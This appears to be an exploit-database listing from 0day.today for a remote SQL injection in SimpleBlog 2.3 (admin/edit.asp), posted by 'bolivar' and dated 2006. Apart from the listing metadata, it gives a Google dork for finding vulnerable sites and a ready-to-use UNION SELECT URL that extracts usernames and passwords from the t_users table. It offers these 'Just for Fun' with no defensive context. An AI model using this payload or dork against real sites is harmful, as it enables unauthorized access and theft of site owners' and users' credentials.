[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

SimpleBlog <= 2.3 (admin/edit.asp) Remote SQL Injection Vulnerability

Author
bolivar
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-1215
Category
web applications
Date add
26-11-2006
Platform
unsorted
=====================================================================
SimpleBlog <= 2.3 (admin/edit.asp) Remote SQL Injection Vulnerability
=====================================================================



# Title   :  simpleblog <= v 2.3 (/admin/edit.asp) Remote SQL Injection Vulnerability
# Author  :  bolivar
# Dork    :  "SimpleBlog 2.3 by 8pixel.net"

---------------------------------------------------------------------------

http://[target]/[path]/admin/edit.asp?id=-1+union+select+0,uUSERNAME,uPASSWORD,0,0,0,0,0,0+from+t_users

---------------------------------------------------------------------------
# Just for Fun!!



#  0day.today [2024-11-15]  #